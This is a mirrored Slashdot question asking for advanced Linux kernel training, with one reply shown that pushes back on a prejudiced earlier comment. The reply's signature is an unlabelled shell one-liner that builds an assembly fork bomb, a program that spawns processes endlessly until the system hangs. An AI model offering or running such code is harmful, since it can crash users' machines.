Slashdot Mirror


Best Advanced Linux Kernel Training?

hdxia writes "Can anybody recommend a good Linux kernel training course? I have had some Linux kernel hacking experience, but would like to further harden and improve my understanding of the kernel. I expect the course would be advanced. You may say that the best method would be to dig into the kernel myself, but I really want to have a chance to discuss and learn all aspects of the kernel with an experienced instructor."

1 of 153 comments (clear)

  1. Re:Reads like a mailinglist posting by some H1B by Hal_Porter · · Score: 1, Offtopic

    That sounds pretty racist. So Indians are not allowed to ask the white master race technical questions or something? Seriously, what's the problem.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;